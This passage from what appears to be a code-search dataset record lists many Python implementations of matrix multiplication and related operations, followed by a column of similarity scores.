selfColVectors = self.transpose()\n otherVectors = other.vectors\n otherColVectors = other.transpose()\n vectors = list()\n for col in range(other.n):\n cordinator = []\n\n for row in range(self.m):\n coord = 0\n\n for k in range(other.m):\n coord += (\n selfVectors[row].coords[k]\n * otherColVectors.vectors[col].coords[k]\n )\n\n cordinator.append(coord)\n\n v = Vector(cordinator)\n vectors.append(v)\n matrix = Matrix(vectors)\n matrix = matrix.transpose()\n return matrix\n elif isinstance(other, int) or isinstance(other, float): # Skalering af matrix\n for i in range(len(self.vectors)):\n self.vectors[i] *= other\n else:\n raise ValueError(\n \"Can only multiply Matrix with Matrix, Vector, Integer or Float\"\n )", "def calculate_matmul(mat_a, mat_b):\n assert mat_a.shape[-2] == 1 and mat_b.shape[-1] == 1\n return tf.reduce_sum(tf.squeeze(mat_a, -2) * tf.squeeze(mat_b, -1), axis=2, keepdims=True)", "def __mul__(self, other):\n return Matrix3(\n self.i * other,\n self.j * other,\n self.k * other,\n )", "def _matmult(A, x):\n b = []\n for a in A:\n b.append(sum([ai * xi for ai, xi in zip(a, x)]))\n return b", "def __mul__(self, otherMatrix):\n if not (len(self.array[0]) == len(otherMatrix.array)):\n raise ArithmeticError\n\n common = len(self.array[0])\n X = len(self.array)\n Y = len(otherMatrix.array[0])\n newArray = [[0 for x in range(X)] for x in range(Y)]\n\n for row in range(X):\n for col in range(Y):\n for elem in range(common):\n newArray[row][col] += self.array[row][elem] * otherMatrix.array[elem][col]\n\n\n return matrix(newArray)", "def matrix_multiply(x, y):\r\n\r\n # handle the base case of receiving\r\n # two empty matrices\r\n if x == [] and y == []:\r\n return []\r\n\r\n # determine the number of rows and columns in the result matrix\r\n num_rows = len(x)\r\n num_cols = len(y[0])\r\n\r\n num_cross = len(x[0])\r\n\r\n # initialize the result matrix\r\n 
result_matrix = [[0] * num_cols for _ in xrange(num_rows)]\r\n\r\n # compute the values for each cell of the result\r\n # matrix\r\n for row_index in xrange(num_rows):\r\n for col_index in xrange(num_cols):\r\n\r\n # sum up the corresponding values from\r\n # x and y\r\n for multiplication_index in xrange(num_cross):\r\n\r\n x_value = x[row_index][multiplication_index]\r\n y_value = y[multiplication_index][col_index]\r\n\r\n result_matrix[row_index][col_index] += x_value * y_value\r\n\r\n return result_matrix", "def __mul__(self, other):\n if isinstance(other, (int, float)):\n newmat = make_matrix(self.rows, self.cols)\n for i in range(newmat.rows):\n for j in range(newmat.cols):\n newmat[i, j] = self[i, j] * other\n elif isinstance(other, Matrix):\n if self.cols != other.rows:\n raise IndexError(\"Row/column mismatch: (%i, %i) x (%i, %i)\"%\n (self.rows, self.cols, other.rows, other.cols))\n\n newmat = make_matrix(self.rows, other.cols)\n\n for i in range(newmat.rows):\n for j in range(newmat.cols):\n for k in range(self.cols):\n newmat[i, j] += self[i, k] * other[k, j]\n return newmat", "def multiplication(self):\n try:\n multiplication = self.matrix1 * self.matrix2\n except Exception as e:\n return \"Error: {}\".format(e)\n\n return multiplication", "def matrix_dot(*args):\r\n rval = args[0]\r\n for a in args[1:]:\r\n rval = theano.tensor.dot(rval, a)\r\n return rval", "def __matmul__(self, tensor):\n return self.matmul(tensor)", "def multiply(A, B, *args, **kwargs):\n dim=A.__len__()\n assert(dim==B.__len__())\n C=[]\n for ii in range(dim):\n shape=(A[ii].shape[0]*B[ii].shape[0], A[ii].shape[1])\n val=np.empty(shape)\n for iimn, (mm, nn) in enumerate(itertools.product(list(range(A[ii].shape[0])), list(range(B[ii].shape[0])))):\n val[iimn] = A[ii][mm]*B[ii][nn]\n C.append(val)\n return C", "def matrix_multiplication_loop(x_matrix, y_matrix):\n result = []\n for i, row in enumerate(x_matrix):\n row_vector = []\n for j in range(len(y_matrix[0])):\n product = 0\n for k in range(len(row)):\n product += x_matrix[i][k] * y_matrix[k][j]\n row_vector.append(product)\n result.append(row_vector)\n return result", "def matr_prod(_A, _B):\r\n # Matrix multiplication\r\n B0 = _B[0]\r\n lenB = len(_B)\r\n lenA = len(_A)\r\n if(len(_A[0]) != lenB): # Check matrix dimensions \r\n Exception('Matrices have wrong dimensions')\r\n if(isinstance(B0, list) or isinstance(B0, array) or isinstance(B0, tuple)): #_B is matrix\r\n lenB0 = len(B0)\r\n C = [[0 for row in range(lenB0)] for col in range(lenA)]\r\n for i in range(lenA):\r\n for j in range(lenB0):\r\n for k in range(lenB):\r\n C[i][j] += _A[i][k]*_B[k][j]\r\n else: #_B is vector\r\n C = [0 for row in range(lenB)]\r\n for i in range(lenA):\r\n for k in range(lenB):\r\n C[i] += _A[i][k]*_B[k]\r\n return C", "def __matmul__(self, csys):\n self._transform(csys)\n return self", "def StrassenMatrixM(a, b):\r\n if len(a) != 2 or len(a[0]) != 2 or len(b) != 2 or len(b[0]) != 2:\r\n raise Exception('Matrices should be 2x2!')\r\n print(a[0][0] * b[0][1] + a[0][1] * b[1][1])\r\n matrix = [[a[0][0] * b[0][0] + a[0][1] * b[1][0], a[0][0] * b[0][1] + a[0][1] * b[1][1]],\r\n [a[1][0] * b[0][0] + a[1][1] * b[1][0], a[1][0] * b[0][1] + a[1][1] * b[1][1]]]\r\n\r\n return matrix", "def transforms_multiply(t0s, t1s):\r\n \r\n return ut.matrix_multiply(t0s, t1s)", "def __mul__(self, other):\n if not isinstance(other, Matrix):\n return NotImplemented\n\n if self.num_cols != other.num_rows:\n raise ValueError(\"self.num_cols (%d) != other.num_rows (%d)\" % (self.num_cols, 
other.num_cols))\n\n new_mat = Matrix(self.num_rows, other.num_cols)\n\n # iterate through rows of self\n for i in range(self.num_rows):\n # iterate through columns of other\n for j in range(other.num_cols):\n # iterate through rows of other\n for k in range(other.num_rows):\n new_mat[i, j] += self[i, k] * other[k, j]\n\n return new_mat", "def __mul__(self, oth):\n\t\tif isinstance(oth, Matrix) or isiterable(oth):\n\t\t\t# matrix\n\t\t\toth_m = oth\n\t\t\tif not isinstance(oth_m, Matrix):\n\t\t\t\toth_m = Matrix(oth_m)\t\t\t\n\t\t\tres_m = self._mat_mul(oth_m)\n\t\t\tif isinstance(oth, Matrix):\n\t\t\t\treturn res_m\n\t\t\telse:\n\t\t\t\treturn type(oth)(res_m._unnest())\n\t\telse:\n\t\t\t# scalar\n\t\t\treturn Matrix._make_new(lambda i,j: self.data[i][j] * oth, self.rows, self.cols)", "def naive_multiply(a, b):\n m = len(a) # Number of rows in first matrix\n k = len(b) # Number of rows in the second matrix\n res = []\n p = len(b[0])\n n = k\n for q in range(m):\n res.append([0])\n for q in range(m):\n for w in range(p - 1):\n res[q].append(0)\n for i in range(m):\n for j in range(p):\n for r in range(n):\n res[i][j] = a[i][r] * b[r][j] + res[i][j]\n return res", "def mult_img_matrix(imgs, matrix):\n nimgs, ny, nx = imgs.shape\n\n vec = np.reshape(imgs, [nimgs, ny * nx])\n vec_out = matrix.dot(vec)\n imgs_out = np.reshape(vec_out, [nimgs, ny, nx])\n\n return imgs_out", "def test_matmul_mm(self):\n self.check_dot_mm(matmul_usecase, None, \"'@'\")", "def matmul(x, y):\n if len(list(y.size())) == 2:\n # if one of them is a vector (i.e. wanting to do MV mult)\n z = torch.zeros(2, x.size()[1], dtype=torch.double, device=x.device)\n z[0] = torch.mv(x[0], y[0]) - torch.mv(x[1], y[1])\n z[1] = torch.mv(x[0], y[1]) + torch.mv(x[1], y[0])\n\n if len(list(y.size())) == 3:\n z = torch.zeros(\n 2, x.size()[1], y.size()[2], dtype=torch.double, device=x.device\n )\n z[0] = torch.matmul(x[0], y[0]) - torch.matmul(x[1], y[1])\n z[1] = torch.matmul(x[0], y[1]) + torch.matmul(x[1], y[0])\n\n return z", "def __matmul__(self, other):\n if isinstance(other, types.Vector):\n return self.apply(target=other)\n if isinstance(other, MatrixLieGroup):\n return self.multiply(other=other)\n else:\n assert False, \"Invalid argument\"", "def __mul__(self, scalar):\n m, n = self.shape\n scalar = mpfr(scalar)\n data = dict()\n for i in range(m):\n for j in range(n):\n data[i, j] = self[i, j] * scalar\n return MPMatrix((m, n), data)", "def matrix_mult(A,B,mod=10**9+7):\n C = [[1,1],[1,1]]\n C[0][0] = ((A[0][0]*B[0][0])%mod + (A[0][1]*B[1][0])%mod)%mod\n C[0][1] = ((A[0][0]*B[0][1])%mod + (A[0][1]*B[1][1])%mod)%mod\n C[1][0] = ((A[1][0]*B[0][0])%mod + (A[1][1]*B[1][0])%mod)%mod\n C[1][1] = ((A[1][0]*B[0][1])%mod + (A[1][1]*B[1][1])%mod)%mod\n return C", "def python_nonsquare_matrix_mult(matrix):\n\n transposed_matrix = np.zeros([matrix.shape[1],matrix.shape[0]])\n start = time.time()\n # for i in range(matrix.shape[0]):\n # for j in range(matrix.shape[1]):\n # transposed_matrix[j,i] = matrix[i,j]\n\n transposed_matrix = np.transpose(matrix)\n product = matrix.dot(transposed_matrix)\n\n # transposed_matrix = np.transpose(matrix)\n end = time.time()-start\n\n # print(\"Python Golden Transpose: %s\" % product)\n # print('python transpose time: %.2E' % end)\n return [product, end]", "def matrix_dot(*args):\n rval = args[0]\n for a in args[1:]:\n rval = tm.dot(rval, a)\n return rval", "def multiply(self, b):\n assert(self.Dimension == b.Dimension)\n p = []\n for meb in b.Elements:\n for mea in self.Elements:\n if mea.j == meb.i:\n 
temp = mea.val * meb.val\n temp = MatrixElement(mea.i, meb.j, temp)\n p.append(temp)\n p = SparseMatrix(len(p), p)\n #print(p)\n return p", "def combine_one_matrices(mul):\n factor, args = mul.as_coeff_matrices()\n new_args = [args[0]]\n\n for B in args[1:]:\n A = new_args[-1]\n if not isinstance(A, OneMatrix) or not isinstance(B, OneMatrix):\n new_args.append(B)\n continue\n new_args.pop()\n new_args.append(OneMatrix(A.shape[0], B.shape[1]))\n factor *= A.shape[1]\n\n return newmul(factor, *new_args)", "def __mul__(self, other):\n if isinstance(other, (int, float)):\n return Matrix([[self.values[row][index] * other\n for index in range(len(self.values[0]))]\n for row in range(len(self.values))])\n\n elif isinstance(other, Vector):\n return Vector([other.dot(Vector(row)) for row in self.values])\n\n elif isinstance(other, Matrix):\n return Matrix([(other.transpose() * Vector(row)).values\n for row in self.values])", "def __mul__(self,other):\n # \n # 注意矩阵的A的列 与 相乘矩阵B的行必须相等,才能进行运算\n height = 0\n width = 0\n if isinstance(other, list): # 判断other是否是矩阵,即list形式的矩阵\n height = len(other)\n width = len(other[0])\n else:\n # 如果是对象,则直接获取行列值\n height = other.h\n width = other.w\n\n\n my_mul = zeroes(self.h, self.w)\n if self.w == height: # 两个矩阵的行列值需要相等 才能相乘\n for i in range(self.h):\n for j in range(width):\n my_sum = 0\n for k in range(height):\n if isinstance(other, list):\n my_sum += self.g[i][k] * other[k][j]\n # 通过3个循环变量取所有矩阵的行列值\n else:\n my_sum += self.g[i][k] * other.g[k][j]\n my_mul[i][j] = my_sum\n return my_mul \n else:\n return NotImplementedError", "def calculate_matmul_n_times(n_components, mat_a, mat_b):\n res = np.zeros(mat_a.shape)\n mat_a = tf.cast(mat_a, tf.double)\n mat_b = tf.cast(mat_b, tf.double)\n for i in range(n_components):\n mat_a_i = tf.squeeze(mat_a[:, i, :, :], -2)\n mat_b_i = tf.squeeze(mat_b[0, i, :, :])\n res[:, i, :, :] = tf.expand_dims(tf.matmul(mat_a_i, mat_b_i), 1)\n\n return tf.convert_to_tensor(res)", "def matmul(A, B):\n # type: (Optional[Tensor], Tensor) -> Tensor\n if A is None:\n return B\n if is_sparse(A):\n return torch.sparse.mm(A, B)\n return torch.matmul(A, B)", "def matrix_add():", "def __mul__(left, right):\n \n if isinstance(left, Plucker) and isinstance(right, Plucker):\n # reciprocal product\n return np.dot(left.uw, right.v) + np.dot(right.uw, left.v)\n elif isinstance(left, Plucker) and arg.ismatrix(right, (4,None)):\n return left.skew @ right; # postmultiply by 4xN", "def __mul__(self, other):\n N = self.matrix.shape[1]\n\n if isinstance(other, _PysparseMatrix):\n return _PysparseMatrix(matrix=spmatrix.matrixmultiply(self.matrix, other.matrix))\n else:\n shape = numerix.shape(other)\n if shape == ():\n L = spmatrix.ll_mat(N, N, N)\n L.put(other * numerix.ones(N, 'l'))\n return _PysparseMatrix(matrix=spmatrix.matrixmultiply(self.matrix, L))\n elif shape == (N,):\n y = numerix.empty((self.matrix.shape[0],))\n self.matrix.matvec(other, y)\n return y\n else:\n raise TypeError", "def my_matmul(x, y):\n ##\n cmd = getattr(th, \"matmul\")\n x1, x2 = my_cut(x)\n y1, y2 = my_cut(y)\n x2y1 = cmd(x2, y1)\n x1y2 = cmd(x1, y2)\n x2y2 = cmd(x2, y2)\n ret = (x2y1 + x1y2) % int24field * int24field + x2y2\n ret = int48module(ret)\n return ret", "def Mult(self, *args):\n return _hypre.HypreParMatrix_Mult(self, *args)", "def add_matrices(m1, m2): \n output = []\n \n for index in range(len(m1)):\n row_1 = m1[index]\n row_2 = m2[index]\n new_row = []\n for index2 in range(len(row_1)):\n sum = row_1[index2] + row_2[index2]\n new_row.append(sum)\n 
output.append(new_row)\n return output", "def __mul__(self, other):\n if hasattr(other, 'as_homogenous_transformation'):\n return basis(homogenous_transformation = self.as_homogenous_transformation() * other.as_homogenous_transformation())\n elif hasattr(other, 'n'):\n if other.n == (3,1):\n b = matrix.col((other[0], other[1], other[2], 1))\n elif other.n == (4,1):\n b = other\n else:\n raise TypeError(b, \"Incompatible matrices\")\n p = self.as_homogenous_transformation() * b\n if other.n == (3,1):\n return matrix.col(p[0:3])\n else:\n return p\n else:\n raise TypeError(b)", "def chain_matmul_square(As):\n\n As_matmul = As\n while As_matmul.shape[0] > 1:\n if As_matmul.shape[0] % 2:\n A_last = As_matmul[-1:]\n else:\n A_last = None\n \n As_matmul = torch.matmul(As_matmul[0:-1:2], As_matmul[1::2])\n if A_last is not None:\n As_matmul = torch.cat([As_matmul, A_last], dim=0)\n \n return As_matmul.squeeze(0)" ]
[ "0.839403", "0.77877283", "0.7786913", "0.76345795", "0.7578386", "0.752093", "0.7499151", "0.7495682", "0.74534243", "0.7433087", "0.74056447", "0.73597676", "0.7326738", "0.732322", "0.7322675", "0.731054", "0.72843087", "0.7257866", "0.72538614", "0.7223289", "0.7222726", "0.72109926", "0.7210884", "0.7193421", "0.71875936", "0.71751803", "0.7163928", "0.71602404", "0.7155903", "0.7155264", "0.7137124", "0.7122708", "0.7121784", "0.7111911", "0.71113205", "0.70916426", "0.7086545", "0.70816576", "0.70795447", "0.7077852", "0.70775175", "0.7033606", "0.7033606", "0.7029227", "0.7028709", "0.699483", "0.69830054", "0.69756466", "0.69481534", "0.6940633", "0.6936434", "0.69152826", "0.6908271", "0.68917704", "0.6884037", "0.6880783", "0.6856087", "0.6835476", "0.6832661", "0.68229556", "0.6805816", "0.68014777", "0.67662555", "0.67474926", "0.674167", "0.6732484", "0.6722109", "0.6704609", "0.66893065", "0.66819334", "0.6656226", "0.6628479", "0.66209966", "0.6617495", "0.6610446", "0.6609819", "0.6606465", "0.6603155", "0.6601432", "0.659203", "0.6590573", "0.6587667", "0.65850896", "0.65682054", "0.6558304", "0.6546407", "0.65379286", "0.652602", "0.6522618", "0.6500239", "0.64959496", "0.6460276", "0.644583", "0.6435343", "0.6418276", "0.64123225", "0.64027333", "0.6394951", "0.63910294", "0.6379685", "0.6375029" ]
0.0
-1
r""" Return the list of entries of this matrix.
def list(self):
    return [self[i,j] for i in range(self._d) for j in range(self._d)]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def as_list(self):\n data = []\n for row in self._matrix_data:\n for column in row:\n data.append(column)\n return data", "def rows(self):\n return list(self)", "def as_list_of_lists(self):\n return self._matrix_data", "def readentries(self):\n return list(x for x in self)", "def entries(self):\n out = []\n for y,x in self.coords(False):\n out.append((y,x,self.retrieve(y,x)))\n return out", "def rows(self):\n return self._row_list", "def entries(self):\n return self._entries", "def entries(self):\n return self._entries", "def rows(self) -> List[List]:\n return self._rows", "def get_entries(self) -> List[Entry]:\n return list(self.__entries)", "def getEntries(self):\n return self.entries", "def rows(self):\n return self.row", "def getEntries(self):\n return self.__entries", "def to_list_flat(self):\n return self.rep.entries()", "def get_data(self) -> List[List[int]]:\n sudoku_array = []\n for row in self.entries:\n sudoku_array.append([0 if entry.text == '' else int(entry.text) for entry in row])\n return sudoku_array", "def list(self):\n return self.cell.objects+self.cell.tempObjects", "def values(self):\n return [row.values for row in self]", "def At_list(self):\n return self.Atom_list", "def to_list(self):\n return self.main_list[:self.num_elements]", "def tolist (self) :\r\n if self.complex :\r\n result = []\r\n for x in xrange(0,len(self)) :\r\n result.append(self[x])\r\n return result\r\n else :\r\n return self.impl.tolist()", "def entries():\n\n\treturn [entry.value for entry in db.session.query(Entry).all()]", "def rows(self):\n return self.Rows(self)", "def cols(self):\n\n return []", "def get_entries(self):\n return self._netdis.loxone.entries", "def get_rows(self):\n return utils.copy_matrix(self.board)", "def entries(self) -> \"list[tuple[Codepoint, EffectiveWidth]]\":\n result = list(self.entry_set)\n result.sort()\n return result", "def list(self):\n return self._get_list()", "def to_list(self):\n return self._elements", "def list_of_neighbors(self):\n return self.to_coo_matrix().tolil().rows.tolist()", "def get_values(self):\n \n return []", "def toList(self, rowmajor=0):\r\n if rowmajor:\r\n return copy.copy(self.mlist)\r\n else:\r\n return self.transpose().mlist", "def get_list(self):\n return sorted(self.__entries.keys())", "def values(self):\n self._values = [[cell for cell in row]\n for row in self.sheet._op.values]\n # self._values = [cell for row in self.sheet._op.values for cell in row]\n return self._values", "def as_matrix(self):\n return self._data", "def rows(self):\n # NOTE: To avoid duplicating large objects, this is just the\n # mutable private data.\n return self._rows", "def values(self) -> list:\n return self.__values", "def values(self):\n return [ self[x] for x in self ]", "def entries(self):\n return [self._entries[key] for key in self._order]", "def get_entries(\n self,\n entry\n ):\n\n try:\n return self._cache[self._alias[entry]]\n except:\n pass\n\n if entry in self._header:\n \n # get the index\n idx = self._header[entry]\n\n entries = []\n\n for row in self._array:\n tmp = [0 for i in row]\n for i,cell in enumerate(row):\n if cell != 0:\n tmp[i] = self[cell][idx]\n entries.append(tmp)\n\n # add entries to cache\n self._cache[self._alias[entry]] = entries\n\n return entries", "def to_list(self):\n return self.rep.tolist()", "def entries(self):\n if not self._lines:\n self._load_file()\n\n return tuple(self._lines)", "def values(self):\n x = []\n for k in list(self.keys()):\n x.append(self[k])\n return x", "def matrix(self):\n return 
np.matrix(list(self._columns.values()))", "def all(self):\n self.scan()\n return self.entries", "def values(self):\n values = []\n for key in self.keys():\n values.append(self[key])\n return values", "def get_rows(self) -> List[List[str]]:\n return self.content", "def rows(self):\r\n raise NotImplementedError", "def values(self):\r\n return [self[k] for k in self]", "def tolist(self):\n \n ret = []\n \n for e in self:\n ret.append(e)\n \n return ret", "def matrix(self):\n return self._matrix", "def matrix(self):\n return self._matrix", "def data(self) -> List[List[Any]]:\n\n column_wise = [column.values for column in self.plaincolumns]\n row_wise = [list(row) for row in zip(*column_wise)]\n\n return row_wise", "def cells_list(self):\n xx, yy = np.meshgrid(self.x_spacings, self.y_spacings)\n return np.vstack([yy.ravel(), xx.ravel()]).transpose()", "def array(self):\n return list(self.sequence)", "def getAll(self):\n return self.__lst", "def getList(self):\n return self.position.exportToList()", "def getContents(self):\r\n cont=[]\r\n for i in range (len(self._indices)):\r\n cont.append(self._dataset.getPoint(self._indices[i]))\r\n return cont", "def columns(self) -> List[List]:\n return list(map(list, zip(*self.rows)))", "def to_list(self):\n return list(self.data)", "def values(self):\n\t\treturn self.myVals", "def arr(self):\n return self._arr", "def get_list(self):\r\n return self.numbers", "def to_list(self) -> list:\n return self.A.tolist()", "def lists(self):\n return dict.items(self)", "def get_displayed_data(self):\n displayed_data = []\n disp_entry_positions = range(self.first_displayed_entry, self.last_displayed_entry+1)\n #print(\"Displayed entries: {}\".format(disp_entry_positions))\n for entry_num in disp_entry_positions:\n is_active = entry_num == self.pointer\n displayed_entry = self.render_displayed_entry(entry_num, active=is_active)\n displayed_data += displayed_entry\n #print(\"Displayed data: {}\".format(displayed_data))\n return displayed_data", "def get_matrix(self):\n return self._matrix[:3, :]", "def array(self):\n return array(self.get_values())", "def cells(self) -> List[Tuple[int, int]]:\n return self._cells", "def getitems(self):\n if self.onlydiag():\n return self.getdiag()\n else:\n return self.items()", "def values(self) -> List:\n pass", "def get_all(self):\n list = []\n line = self.get()\n while line:\n list.append(line)\n line = self.get()\n return list", "def list(self) -> List:\n return list(self.values())", "def values(self) -> ndarray:\n return self._vals", "def matrix_features(self):\n return self._matrix_features", "def get_entries(self) -> Generator[str, None, None]:\n return (entry for entry in self.entries)", "def infolist(self):\r\n return list(self.infoiter())", "def get_values(self) -> list:\r\n values = []\r\n for key, value in self._items:\r\n values.append(value)\r\n return values", "def as_list(self):\n g = self.args[0]\n H = self.args[1]\n cst = []\n if str(self._dir) == '+':\n for h in H.elements:\n cst.append(h*g)\n else:\n for h in H.elements:\n cst.append(g*h)\n return cst", "def ui_getrow(self):\n return [self.locked*'L',self.idx,self.guid,printsz(self.size),\n printsz(self.cachesize),self.vendor,self.model,\n len(self.paths),len(self.partitions),len(self.usedinluns)\n ]", "def get_conn_matrix_vector(self):\n\n vect = []\n for line in sorted(self.connection_matrix):\n for item in self.connection_matrix[line]:\n vect.append(item)\n\n return vect", "def rows(self):\r\n raise NotImplementedError()", "def array(self):\n return 
self.get_array()", "def list(self):\n return [self.x, self.y, self.z]", "def rows(self) -> java.util.Collection:\n ...", "def data(self) -> List[ndarray]:\n return self._data", "def get_rows(self):\n rowlist = []\n if self.direction == \"horizontal\":\n rowlist.append(int(self.position[0][0]))\n return rowlist\n else:\n rowlist.append(int(self.position[0][0]))\n rowlist.append(int(self.position[1][0]))\n if self.size == 3:\n rowlist.append(int(self.position[2][0]))\n return rowlist", "def values(self):\r\n return self.__values", "def lines(self):\n return self.lines", "def cells(self):\n return chain.from_iterable(self.cols)", "def values(self):\n return [i.value for i in self.value]", "def values(self):\n return [self[k] for k in self.keys()]", "def values (self):\n return self._values", "def values (self):\n return self._values", "def vals(self) -> ndarray:\n return self._vals", "def __iter__(self) -> Iterator[Tuple[K, List[V]]]:\n return (entry for entry in self._table.items())", "def values(self):\n return self._values", "def values(self):\n return self._values", "def values(self):\n return self._values", "def values(self):\n return self._values", "def columns(self):\n return self.__column_list" ]
[ "0.74211484", "0.7351907", "0.7139602", "0.7107239", "0.7102002", "0.7040875", "0.700234", "0.700234", "0.69514894", "0.6915959", "0.6805772", "0.68021935", "0.67886513", "0.6775163", "0.6770315", "0.6736421", "0.67067957", "0.66475236", "0.6628927", "0.66164464", "0.65946597", "0.6570721", "0.6539913", "0.653377", "0.65327", "0.6511432", "0.6499319", "0.6491782", "0.64409816", "0.6394279", "0.6361168", "0.63452286", "0.63422114", "0.63421136", "0.6338142", "0.63303053", "0.63302374", "0.6320387", "0.6305276", "0.6293655", "0.6290904", "0.6276081", "0.6273789", "0.62736857", "0.6239219", "0.6236895", "0.6233921", "0.6232702", "0.62302876", "0.6221393", "0.6221393", "0.62197894", "0.6206175", "0.620273", "0.6199111", "0.6197966", "0.6194342", "0.61911935", "0.6186292", "0.6184974", "0.6183829", "0.61828524", "0.61765933", "0.61715543", "0.61708647", "0.6166792", "0.61667436", "0.61441207", "0.613997", "0.61338234", "0.61179703", "0.61110413", "0.6110968", "0.6110922", "0.61051065", "0.6104968", "0.6102537", "0.60994464", "0.6090314", "0.60887617", "0.6076425", "0.60702175", "0.6069222", "0.6068846", "0.6060944", "0.60536057", "0.6046299", "0.6045127", "0.6043226", "0.60410035", "0.6037136", "0.60338265", "0.60338265", "0.603062", "0.6028495", "0.6018327", "0.6018327", "0.6018327", "0.6018327", "0.60057735" ]
0.69504046
9
r""" Return the list of equal coefficients between self and other.
def equal_coefficients(self, other):
    d = self._d
    return [(i,j) for i in range(d) for j in range(d) \
            if self[i][j] == other[i][j]]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __xor__(self, other):\n\n sym_diff = [value for value in self if value not in other]\n sym_diff.extend([value for value in other if value not in self])\n\n return sym_diff", "def GetEqualConstrains(self):\n return _gmat_py.Spacecraft_GetEqualConstrains(self)", "def coefficients(self) :\n raise NotImplementedError", "def coefficients(self) :\n return self.__coefficients", "def __pow__(self, other):\n n = len(self)\n\n v = zeros_como(self)\n\n for i in range(n):\n v[i] = self[i]**other\n\n return v", "def coefficients(self):\n return self._coefficients", "def coefficients(self):\n return self._coefficients", "def __sub__(self, other: 'ModelParameters') -> 'ModelParameters':\n return ModelParameters([self[idx] - other[idx] for idx in range(len(self))])", "def coefficients(self) -> np.ndarray:\n return self._coefficients", "def get_coefficients(self):\n return self.coefficients", "def get_coefficients(self):\n return self.coefficients", "def __xor__(self, other):\n a, b = Trits.match_length(self, other)\n return Trits([x ^ y for x, y in zip(a, b)])", "def getEquates(self) -> Iterator[ghidra.program.model.symbol.Equate]:\n ...", "def __isub__(self, other):\n self.components = [c1 - c2 for (c1, c2) in zip(self, other)]\n return self", "def __sub__( self, other ) :\n\n try :\n other = float( other )\n c_ls = self.copy( )\n for l, c_l in enumerate( c_ls ) : c_ls.coefficients[l] -= other\n except :\n self.checkSameSeriesType( other )\n c_l1, c_l2 = self.coefficients, other.coefficients\n if( len( self ) < len( other ) ) : c_l1, c_l2 = c_l2, c_l1\n c_ls = c_l1.copy( )\n for l, c_l in enumerate( c_l2 ) : c_ls.coefficients[l] += c_l\n return( c_ls )", "def pd(self, other):\n return Matriz([self]).T() * Matriz([other])", "def find_coefficients(self):\n self.make_matrix()\n self.coeffs = np.linalg.solve(self.global_matrix,self.global_vector)\n self.coeffs = np.append(self.coeffs, self.D) #Initial condition", "def __eq__(self, other):\n if self.coeff != other.coeff:\n return False\n \n if self.GetKeggID() != other.GetKeggID():\n return False\n \n if self.phase.Name() != other.phase.Name():\n return False\n \n return True", "def test_coefficient_orders(self):\n for i in range(2, 5):\n spec = {2*j: 0 for j in range(i)}\n bcs_ref = BoundaryConditions(spec, 2*i-2)\n bcs_main = BoundaryConditions(spec, 2*i)\n\n coeffs_ref = get_ext_coeffs(bcs_ref)[i-1]\n coeffs_main = get_ext_coeffs(bcs_main)[i-1]\n\n assert coeffs_ref == coeffs_main", "def enthalpy_equality_func(self):\n residual = []\n for i in range(self.num_i):\n residual += [self.inl[i].h.val_SI - self.outl[i].h.val_SI]\n return residual", "def coefficients(self, force_characters = False) :\n raise NotImplementedError", "def __xor__(self, other):\r\n return self + other - 2 * self * other", "def IsEqualOrder(self,other):\n return self.InferPolynomialDegree() == other.InferPolynomialDegree()", "def coefficients(self):\r\n return self.coef_['x']", "def __isub__(self, other):\n self.components = [c1 - c2 for (c1, c2) in zip(self.components, other.components)]\n return self", "def __sub__(self, other):\n # \n # TODO - your code here\n #\n result = [];\n for i in range(self.h):\n result.append([a-b for a,b in zip(self.g[i],other.g[i])]);\n \n return Matrix(result);", "def __and__(self, other):\n\n return [value for value in self if value in other]", "def commutator(self, other) -> 'MultiVector':\n\n return ((self * other) - (other * self)) / 2", "def commutes_with(self, other):\n if not isinstance(other, type(self)):\n raise TypeError(\n 'Can only test 
commutation with another MajoranaOperator.')\n\n if len(self.terms) == 1 and len(other.terms) == 1:\n return _majorana_terms_commute(\n list(self.terms.keys())[0],\n list(other.terms.keys())[0])\n return self * other == other * self", "def __sub__(self, other):\n return Vector([c1 - c2 for (c1, c2) in zip(self.components, other.components)])", "def a_coefficients(y1,y2):\n\tACoefficients = np.array([\ty1, \\\n\t\t\t\t\t\t\t\ty2 ]).astype(float)\n\treturn(ACoefficients)", "def __xor__(self, other: t.Any) -> InspectableSet[_C]:\n return self._op_copy('__xor__', other)", "def rhs_atoms(self):\n\n return itertools.chain(self.rhs_names, self.rhs_funcs)", "def difference(self, other): # type: (Term) -> Term\n return self.intersect(other.inverse)", "def getSmoothnessABC(self,other):\n\t\tif not self.sectors == other.sectors:\n\t\t\traise ValueError(\"Sectors do not match\")\n\t\ttotalNzero = self.nZero + other.nZero\n\n\t\tDself = np.zeros((2*self.totalBins))\n\t\tDother = np.zeros((2*other.totalBins))\n\t\tZself = np.zeros((2*totalNzero, 2*self.totalBins))\n\t\tZother = np.zeros((2*totalNzero, 2*other.totalBins))\n\t\tfor s in range(self.nSect):\n\t\t\tstartSelf = self.borders[s]\n\t\t\tstartOther = other.borders[s]\n\t\t\tnBins = min(self.borders[s+1] - self.borders[s], other.borders[s+1] - other.borders[s])\n\t\t\tfor i in range(nBins):\n\t\t\t\tdelRe = self.reals[startSelf+i] - other.reals[startOther+i]\n\t\t\t\tdelIm = self.imags[startSelf+i] - other.imags[startOther+i]\n\t\t\t\tDself[2*(startSelf + i) ] = delRe\n\t\t\t\tDself[2*(startSelf + i)+1] = delIm\n\t\t\t\tDother[2*(startOther + i) ] = delRe\n\t\t\t\tDother[2*(startOther + i)+1] = delIm\n\t\t\t\tfor z in range(self.nZero):\n\t\t\t\t\tzeroVal = self.zeroModes[z][startSelf+i]\n\t\t\t\t\tZself[2*z ,2*(startSelf + i) ] = zeroVal\n\t\t\t\t\tZself[2*z+1,2*(startSelf + i)+1 ] = zeroVal\n\t\t\t\t\tZother[2*z ,2*(startOther + i) ] = zeroVal\n\t\t\t\t\tZother[2*z+1,2*(startOther + i)+1] = zeroVal\n\t\t\t\tz0 = self.nZero\n\t\t\t\tfor z in range(other.nZero):\n\t\t\t\t\tzeroVal = -other.zeroModes[z][startOther+i]\n\t\t\t\t\tZself[2*(z+z0) , 2*(startSelf + i) ] = zeroVal\n\t\t\t\t\tZself[2*(z+z0)+1 , 2*(startSelf + i)+1] = zeroVal\n\t\t\t\t\tZother[2*(z+z0) , 2*(startOther+ i) ] = zeroVal\n\t\t\t\t\tZother[2*(z+z0)+1, 2*(startOther+ i)+1] = zeroVal\n\t\tDCself = 